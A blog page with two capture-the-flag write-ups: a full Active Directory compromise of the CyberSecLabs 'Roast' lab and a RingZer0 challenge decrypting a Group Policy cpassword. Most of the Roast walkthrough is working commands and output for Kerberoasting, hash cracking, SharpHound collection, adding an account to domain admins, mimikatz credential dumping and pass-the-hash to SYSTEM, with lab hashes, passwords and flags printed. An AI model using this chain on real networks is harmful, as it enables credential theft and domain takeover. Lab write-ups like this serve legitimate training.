Posted on

csl-roast-nl

CyberSecLabs – Roast writeup

https://www.cyberseclabs.co.uk/labs/challenge-labs/all

As always we start with a nmap scan

kali@kali:/opt/evil-winrm$ nmap -Pn -vv -A 172.31.3.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 08:06 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 08:06
Completed NSE at 08:06, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 08:06
Completed Parallel DNS resolution of 1 host. at 08:06, 0.00s elapsed
Initiating Connect Scan at 08:06
Scanning 172.31.3.2 [1000 ports]
Discovered open port 53/tcp on 172.31.3.2
Discovered open port 139/tcp on 172.31.3.2
Discovered open port 445/tcp on 172.31.3.2
Discovered open port 135/tcp on 172.31.3.2
Discovered open port 3389/tcp on 172.31.3.2
Discovered open port 636/tcp on 172.31.3.2
Discovered open port 3269/tcp on 172.31.3.2
Discovered open port 593/tcp on 172.31.3.2
Discovered open port 3268/tcp on 172.31.3.2
Discovered open port 464/tcp on 172.31.3.2
Discovered open port 88/tcp on 172.31.3.2
Discovered open port 389/tcp on 172.31.3.2
Completed Connect Scan at 08:06, 6.49s elapsed (1000 total ports)
Initiating Service scan at 08:06
kali@kali:/opt$ nmap -Pn -sV --script "ldap* and not brute*" -p 389 172.31.3.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 08:51 EDT
Nmap scan report for 172.31.3.2
Host is up (0.10s latency).

PORT STATE SERVICE VERSION
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: roast.csl, Site: Default-First-Site-Name)
| ldap-brute:
| root:<empty> => Valid credentials
| admin:<empty> => Valid credentials
| administrator:<empty> => Valid credentials
| webadmin:<empty> => Valid credentials
| sysadmin:<empty> => Valid credentials
| netadmin:<empty> => Valid credentials
| guest:<empty> => Valid credentials
| user:<empty> => Valid credentials
| web:<empty> => Valid credentials
|_ test:<empty> => Valid credentials
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=roast,DC=csl
| ldapServiceName: roast.csl:roast$@ROAST.CSL
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=roast,DC=csl
| serverName: CN=ROAST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=roast,DC=csl
| schemaNamingContext: CN=Schema,CN=Configuration,DC=roast,DC=csl
| namingContexts: DC=roast,DC=csl
| namingContexts: CN=Configuration,DC=roast,DC=csl
| namingContexts: CN=Schema,CN=Configuration,DC=roast,DC=csl
| namingContexts: DC=DomainDnsZones,DC=roast,DC=csl
| namingContexts: DC=ForestDnsZones,DC=roast,DC=csl
| isSynchronized: TRUE
| highestCommittedUSN: 86066
| dsServiceName: CN=NTDS Settings,CN=ROAST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=roast,DC=csl
| dnsHostName: Roast.roast.csl
| defaultNamingContext: DC=roast,DC=csl
| currentTime: 20200817125113.0Z
|_ configurationNamingContext: CN=Configuration,DC=roast,DC=csl
| ldap-search:
| Context: DC=roast,DC=csl
| dn: DC=roast,DC=csl
| dn: CN=David Smith,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: David Smith
| sn: Smith
| description: Your Password is WelcomeToR04st
| givenName: David
| distinguishedName: CN=David Smith,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:30:43 UTC
| whenChanged: 2020/05/15 21:42:47 UTC
| displayName: David Smith
| uSNCreated: 16572
| uSNChanged: 32799
| name: David Smith
| objectGUID: 95a9772-f36-7344-9cc1-53d257cf635e
| userAccountControl: 66048
| badPwdCount: 0
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: 2020-05-18T02:48:58+00:00
| logonHours: \xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF
| pwdLastSet: 2020-05-16T01:46:13+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1103
| accountExpires: Never
| logonCount: 1
| sAMAccountName: dsmith
| sAMAccountType: 805306368
| userPrincipalName: dsmith@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:38:02 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
| lastLogonTimestamp: 2020-05-16T01:48:13+00:00
| dn: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: Cody Rhodes
| sn: Rhodes
| givenName: Cody
| distinguishedName: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:34:11 UTC
| whenChanged: 2020/05/15 21:41:51 UTC
| displayName: Cody Rhodes
| uSNCreated: 16605
| memberOf: CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl
| uSNChanged: 32794
| name: Cody Rhodes
| objectGUID: 264ab96b-32e6-7f47-9f71-45b9eae6ee8
| userAccountControl: 66048
| badPwdCount: 0
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: 2020-05-16T01:58:03+00:00
| logonHours: \xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF
| pwdLastSet: 2020-05-16T01:47:17+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1104
| accountExpires: Never
| logonCount: 2
| sAMAccountName: crhodes
| sAMAccountType: 805306368
| userPrincipalName: crhodes@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:37:46 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
| lastLogonTimestamp: 2020-05-15T10:54:23+00:00
| dn: CN=Steve Smith,OU=Roast,DC=roast,DC=csl
| objectClass: top
| objectClass: person
| objectClass: organizationalPerson
| objectClass: user
| cn: Steve Smith
| sn: Smith
| givenName: Steve
| distinguishedName: CN=Steve Smith,OU=Roast,DC=roast,DC=csl
| instanceType: 4
| whenCreated: 2020/05/15 06:35:06 UTC
| whenChanged: 2020/05/15 06:38:17 UTC
| displayName: Steve Smith
| uSNCreated: 16612
| uSNChanged: 16629
| name: Steve Smith
| objectGUID: 66dc74ae-c214-4e42-94e3-44092523e22
| userAccountControl: 66048
| badPwdCount: 2
| codePage: 0
| countryCode: 0
| badPasswordTime: 2020-05-16T01:47:26+00:00
| lastLogoff: 0
| lastLogon: Never
| pwdLastSet: 2020-05-15T10:40:32+00:00
| primaryGroupID: 513
| objectSid: 1-5-21-4133422454-1522376082-951199702-1105
| accountExpires: 30828-09-14T06:53:31+00:00
| logonCount: 0
| sAMAccountName: ssmith
| sAMAccountType: 805306368
| userPrincipalName: ssmith@roast.csl
| objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl
| dSCorePropagationData: 2020/05/15 06:46:18 UTC
| dSCorePropagationData: 2020/05/15 06:38:17 UTC
| dSCorePropagationData: 1601/01/01 00:00:00 UTC
|_ dn: CN=Roast Svc,OU=Roast,DC=roast,DC=csl
Service Info: Host: ROAST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.48 seconds
kali@kali:/opt$

We make sure we have the latest impacket installed

kali@kali:/opt$ sudo git-clone https://github.com/SecureAuthCorp/impacket.git
sudo: git-clone: command not found
kali@kali:/opt$ sudo git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 18128, done.
remote: Total 18128 (delta 0), reused 0 (delta 0), pack-reused 18128
Receiving objects: 100% (18128/18128), 5.97 MiB | 4.64 MiB/s, done.
Resolving deltas: 100% (13833/13833), done.
kali@kali:/opt$ cd impacket/
kali@kali:/opt/impacket$ pip3 install .

.

kali@kali:/opt/impacket$ crackmapexec smb 172.31.3.2 -u dsmith -p WelcomeToR04st
SMB 172.31.3.2 445 ROAST [*] Windows 10.0 Build 17763 (name:ROAST) (domain:roast.csl) (signing:True) (SMBv1:False)
SMB 172.31.3.2 445 ROAST [+] roast.csl\dsmith:WelcomeToR04st
kali@kali:/opt/evil-winrm$ crackmapexec smb 172.31.3.2 -u dsmith -p WelcomeToR04st --shares
SMB 172.31.3.2 445 ROAST [*] Windows 10.0 Build 17763 (name:ROAST) (domain:roast.csl) (signing:True) (SMBv1:False)
SMB 172.31.3.2 445 ROAST [+] roast.csl\dsmith:WelcomeToR04st
SMB 172.31.3.2 445 ROAST [+] Enumerated shares
SMB 172.31.3.2 445 ROAST Share Permissions Remark
SMB 172.31.3.2 445 ROAST ----- ----------- ------
SMB 172.31.3.2 445 ROAST ADMIN$ Remote Admin
SMB 172.31.3.2 445 ROAST C$ Default share
SMB 172.31.3.2 445 ROAST IPC$ READ Remote IPC
SMB 172.31.3.2 445 ROAST NETLOGON READ Logon server share
SMB 172.31.3.2 445 ROAST SYSVOL READ Logon server share
kali@kali:/opt/evil-winrm$
kali@kali:/opt/impacket$ crackmapexec winrm 172.31.3.2 -u dsmith -p WelcomeToR04st
WINRM 172.31.3.2 5985 ROAST [*] http://172.31.3.2:5985/wsman
WINRM 172.31.3.2 5985 ROAST [-] ROAST0\dsmith:WelcomeToR04st "Failed to authenticate the user dsmith with ntlm"
kali@kali:/tmp$ GetUserSPNs.py -request -dc-ip 172.31.3.2 roast.csl/crhodes -outputfile hashes.kerberoast
Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation

Password:WelcomeToR04st
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- -------- ----------------------------------------------------- -------------------------- --------- ----------
roast/ROAST roastsvc CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl 2020-05-15 02:35:50.302845 <never>
kali@kali:/tmp$ cat hashes.kerberoast
$krb5tgs$23$*roastsvc$ROAST.CSL$roast/ROAST*$a06f00e18dbcc60631026290cd49c8c8$e208b8bb3a69789d214c8901dca6502f2f4136ffa72a47e15c7b3ae887f7494a7b4a2850f1dc51c40b40ac503dbe6c9f6008970a61472611e899705dfbc9c7155f48d129a838264ab8a8a271ee2c5ccd7dab4928e37f12fa8b5e3d6539e4267774b2ce663cdaa8098155c027a6a991cf9b3c3372058da235589a6f1a28b0fcbd3fe715815439efc9979c1cc0bd1cf23f9eb3b9664613f34c91cc18f5325b575586f8b5ab03331bd95bf705e26ba40f0405a4524bc084d6c54c0283a3ddadacac71fe1a3793f7f8592f6f8bf1bddd74859e4c55635dd65419a4e944821696f7437b95f3622a1aeb3dc479b9d1ae73f61590c4b4db1ddff44d1674021a0a86518fafd937a28a43ef017af965322dd0ec2f32a59f7ec699ca2457663c9e82d76c2446363902d27598fa5ba591734d7eaba9e16d599558025244eb68854e94ef3a05bae3e4deaeaf757a7ef567e3824a8b49a40f7b4bb34b5f5bc43956e67726f55dd16a2bbbc70109e059e9f049393e20f36bda7ceb2a7c33dc563583f2447d75b1abdbb2bfb9dcf6cc045b31d93c8c7fdb3cd4f6eabe3cab80c9943c9e6bfdc0c18ff7abc93b9a5239116ff6f81b9edf2ef42b164bb6c27edf0916437f9bbe3452f634324aa4e6ff934658e6acd04b711259dd9e91d82775f79b143047b694d4cf9ba997c39f176aebe259825916494662e1e2b0a2b0eb7d208d4b9dd288d40d60823234fa686941de759bb48c71f768f025447c52fe37e7132c47f5b71ea9d474cc9a1fd892d2ad510eb0446a5354cd785f6770b1c0e4e76af40c2c37f1cc7ea579c421ede4ecf63d640f39763eaa2557ad904d43d9008169563d05870e9488a2b1e6d6c50c755440f3a4c477aebfad5e401ef6684be7ddba7857d271b45e69dc3992807efb68aa44afefe003481121d004b4cda9c4d5b77d72c7018698bd10d9b3be762f2c0a21e424a75a40967b46dcad23862c9b76ccea70fa28260d6e86c2489b58e97bfa61d6ad4a3cca99c296ca3bef63963ca29db7658690ba9587f060868132a291065b4b3abca17c1f50260eb6dcf82a0994d584626c4358e2f81c28382e1a1310fc36c88a4f7e6c809035e3b2427f6a202c55294f261023f2ef25f05721c2c3e307ccd1dd7496e2fa9720fa35ddbdf752a21b16871367960c130538278731484cef2b8d37aec73ebf38da421a1fe96626132b42dc072e80236dbf9396f40af9a20622de811529ab3b54deeb1af3d974c77ea4eadfa5ac6b9f7eb2d0782edd5ffd706e760869e11d4c1b2540f2d7f74f7f3bbc3a65
kali@kali:/tmp$
kali@kali:/tmp$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!!!watermelon245 (?)
1g 0:00:00:25 DONE (2020-08-18 05:25) 0.03957g/s 567616p/s 567616c/s 567616C/s !!12Honey.. 0860776252
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:/tmp$
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u roastsvc -p '!!!watermelon245'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\roastsvc\Documents>
kali@kali:/opt/evil-winrm$ crackmapexec winrm 172.31.3.2 -u crhodes -p WelcomeToR04st
WINRM 172.31.3.2 5985 ROAST [*] http://172.31.3.2:5985/wsman
WINRM 172.31.3.2 5985 ROAST [+] ROAST0\crhodes:WelcomeToR04st (Pwn3d!)
kali@kali:/opt/evil-winrm$
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u crhodes -p 'WelcomeToR04st'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\crhodes\Documents> cd c:\puck

*Evil-WinRM* PS C:\puck> upload /opt/Bloodhound/Ingestors/Sharphound.exe
Info: Uploading /opt/Bloodhound/Ingestors/Sharphound.exe to C:\puck\Sharphound.exe


Data: 1110016 bytes of 1110016 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\puck> upload /opt/Bloodhound/Ingestors/Sharphound.ps1
Info: Uploading /opt/Bloodhound/Ingestors/Sharphound.ps1 to C:\puck\Sharphound.ps1


Data: 1297764 bytes of 1297764 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\puck> dir


Directory: C:\puck


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/18/2020 3:42 AM 832512 Sharphound.exe
-a---- 8/18/2020 3:42 AM 973323 Sharphound.ps1


*Evil-WinRM* PS C:\puck> ./Sharphound.exe
-----------------------------------------------
Initializing SharpHound at 3:42 AM on 8/18/2020
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain ROAST.CSL using path CN=Schema,CN=Configuration,DC=ROAST,DC=CSL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 61 objects finished (+61 61)/s -- Using 26 MB RAM
Enumeration finished in 00:00:01.8335102
Compressing data to .\20200818034254_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 3:42 AM on 8/18/2020! Happy Graphing!

*Evil-WinRM* PS C:\puck> dir


Directory: C:\puck


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/18/2020 3:42 AM 8935 20200818034254_BloodHound.zip
-a---- 8/18/2020 3:42 AM 832512 Sharphound.exe
-a---- 8/18/2020 3:42 AM 973323 Sharphound.ps1
-a---- 8/18/2020 3:42 AM 10118 ZDU2MDE4M2MtOTJlZC00MTRlLWFhMmEtOGJlM2E2ODA4ZjUy.bin
*Evil-WinRM* PS C:\puck>
*Evil-WinRM* PS C:\puck> download 20200819234325_BloodHound.zip /tmp/20200819234325_BloodHound.zip
Info: Downloading C:\puck\20200819234325_BloodHound.zip to /tmp/20200819234325_BloodHound.zip

Info: Download successful!
*Evil-WinRM* PS C:\puck>

 

net group “domain admins” roastsvc /add

*Evil-WinRM* PS C:\users\roastsvc\Documents> ./mimikatz.exe "privilege:debug" "lsadump::lsa /patch" "exit"

.#####. mimikatz 2.2.0 (x64) #18362 May 2 2020 16:23:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(commandline) # privilege:debug
ERROR mimikatz_doLocal ; "privilege:debug" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::lsa /patch
Domain : ROAST0 / S-1-5-21-4133422454-1522376082-951199702

RID : 000001f4 (500)
User : Administrator
LM :
NTLM : f6861a8cfc1c3b9f3ff39a8adb6bd388

RID : 000001f5 (501)
User : Guest
LM :
NTLM :

RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 016e928748d559770ee5fe3028baf718

RID : 0000044f (1103)
User : dsmith
LM :
NTLM : a0a8160111b21d48d2e816f4cc8da053

RID : 00000450 (1104)
User : crhodes
LM :
NTLM : a0a8160111b21d48d2e816f4cc8da053

RID : 00000451 (1105)
User : ssmith
LM :
NTLM : 23991f3cd665b0bc1f7cccfd62506161

RID : 00000452 (1106)
User : roastsvc
LM :
NTLM : 2f77331cfd7b2142b3a86a7d2ce7e824

RID : 000003e8 (1000)
User : ROAST$
LM :
NTLM : 0db85ab8c8395c6c1333a4e9e90ae400

mimikatz(commandline) # exit
Bye!
*Evil-WinRM* PS C:\users\roastsvc\Documents>
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u Administrator -H f6861a8cfc1c3b9f3ff39a8adb6bd388

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

.

kali@kali:/opt/evil-winrm$ psexec.py -hashes f6861a8cfc1c3b9f3ff39a8adb6bd388:f6861a8cfc1c3b9f3ff39a8adb6bd388 administrator@172.31.3.2
Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 172.31.3.2.....
[*] Found writable share ADMIN$
[*] Uploading file EqimrmMk.exe
[*] Opening SVCManager on 172.31.3.2.....
[*] Creating service Plxk on 172.31.3.2.....
[*] Starting service Plxk.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
Roast

C:\Windows\system32>

.

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u Administrator -H f6861a8cfc1c3b9f3ff39a8adb6bd388

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
Roast
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\desktop> type system.txt.txt
9d91f887b78d82444a5af8bbd0d115db


*Evil-WinRM* PS C:\Users\Get-ChildItem -Path C:\Users -Filter *.txt.txt -Recurse -ErrorAction SilentlyContinue -Force
*Evil-WinRM* PS C:\Users\Administrator\desktop> type system.txt.txt
9d91f887b78d82444a5af8bbd0d115db
*Evil-WinRM* PS C:\Users> type C:\Users\roastsvc\Desktop\access.txt
0042894e0a6b2bc2c4517c5f7ccc5c16

.

 

https://m.twitch.tv/videos/708116376

Author : Puckiestyle

 

rz-challenge51-nl

Spoiler Alert

challenge at https://ringzer0ctf.com/challenges/51

I Lost my password can you find it?

First, download the file and unzip it.
In order to resolve this challenge, you need to decrypt something called “cpassword” that is easy thanks to this:“Microsoft published the AES encryption key used to protect cpassword attributes in Group Policy preference items (CVE-2014-1812 / MS14-025).”
If you use Windows, you can download this program that does not require installation: https://bitbucket.org/grimhacker/gpppfinder/downloads/

Once downloaded you have to find the following file inside the unzipped challenge file: Policies\{75DE8F0A-DEC0-441F-AE29-90DFAFCF632B}\User\Preferences\Groups\Groups.xml
Once opened, you will see: cpassword=PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw
This base64 string is broken. You need to add “=” at the end to make it fine.

Once done, execute the program with that base64 password and you will get the following:

gp3finder_v5.0.exe -D PCXrmCkYWyRRx3bf+zqEydW9/trbFToMDx6fAvmeCDw=

Group Policy Preference Password Finder (GP3Finder) 5.0.0
Copyright (C) 2020 Oliver Morton
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See GPLv2 License.

INFO: gp3finder: Decrypted password is 10 characters.
INFO: gp3finder: ———-
INFO: gp3finder: LocalRoot!
INFO: gp3finder: ———-

Author : Puckiestyle